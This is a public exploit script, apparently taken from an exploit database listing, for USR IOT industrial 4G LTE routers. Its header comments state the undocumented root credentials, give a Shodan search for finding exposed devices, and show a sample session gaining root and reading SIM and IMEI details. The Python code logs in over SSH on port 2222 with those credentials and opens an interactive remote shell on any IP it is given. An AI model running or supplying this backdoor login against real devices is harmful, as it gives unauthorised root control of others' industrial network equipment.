Share 
## https://sploitus.com/exploit?id=1337DAY-ID-37660
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*"  // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd"  && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$ 
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

bnr='''
        โ–„โ€ข โ–„โ–Œ.โ–„โ–„ ยท โ–„โ–„โ–„  โ–ช        โ–„โ–„โ–„โ–„โ–„        
        โ–ˆโ–ชโ–ˆโ–ˆโ–Œโ–โ–ˆ โ–€. โ–€โ–„ โ–ˆยทโ–ˆโ–ˆ โ–ช     โ€ขโ–ˆโ–ˆ          
        โ–ˆโ–Œโ–โ–ˆโ–Œโ–„โ–€โ–€โ–€โ–ˆโ–„โ–โ–€โ–€โ–„ โ–โ–ˆยท โ–„โ–ˆโ–€โ–„  โ–โ–ˆ.โ–ช        
        โ–โ–ˆโ–„โ–ˆโ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท        
โ–„โ–„โ–„โ–„ยท  โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–„ โ€ขโ–„ ยทโ–„โ–„โ–„โ–„ โ–€โ–ˆโ–„โ–€โ–ช โ–€โ–€โ–€    โ–„โ–„โ–„  
โ–โ–ˆ โ–€โ–ˆโ–ชโ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–ˆโ–Œโ–„โ–Œโ–ชโ–ˆโ–ˆโ–ช โ–ˆโ–ˆ โ–ช     โ–ช     โ–€โ–„ โ–ˆยท
โ–โ–ˆโ–€โ–€โ–ˆโ–„โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–„ยทโ–โ–ˆยท โ–โ–ˆโ–Œ โ–„โ–ˆโ–€โ–„  โ–„โ–ˆโ–€โ–„ โ–โ–€โ–€โ–„ 
โ–ˆโ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆ.โ–ˆโ–Œโ–ˆโ–ˆ. โ–ˆโ–ˆ โ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ€ขโ–ˆโ–Œ
ยทโ–€โ–€โ–€โ–€  โ–€  โ–€ โ–„โ–„โ–„โ–€ ยทโ–€  โ–€โ–€โ–€โ–€โ–€โ–€โ€ข โ–„โ–„โ–„โ–„โ–„โ–ช โ–€โ–ˆโ–„โ–€โ–ช.โ–€  โ–€
            โ–€โ–„ โ–ˆยทโ–ช     โ–ช     โ€ขโ–ˆโ–ˆ              
            โ–โ–€โ–€โ–„  โ–„โ–ˆโ–€โ–„  โ–„โ–ˆโ–€โ–„  โ–โ–ˆ.โ–ช            
            โ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท            
         โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–ˆโ–„โ–„ยท โ–„โ–„โ–„โ–€..โ–„โ–„โ–€ยท .โ–„โ–„ ยท      
        โ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–โ–ˆ โ–Œโ–ชโ–€โ–„.โ–€ยทโ–โ–ˆ โ–€. โ–โ–ˆ โ–€.      
        โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–ชโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„     
        โ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–„โ–„โ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ–„โ–ชโ–โ–ˆ     
         โ–€  โ–€ ยทโ–€โ–€โ–€ ยทโ–€โ–€โ–€  โ–€โ–€โ–€  โ–€โ–€โ–€โ–€  โ–€โ–€โ–€โ–€      
'''
print(bnr)

if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    print('--Backdoor removed.')
    exit(-1)

while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

rsh.close()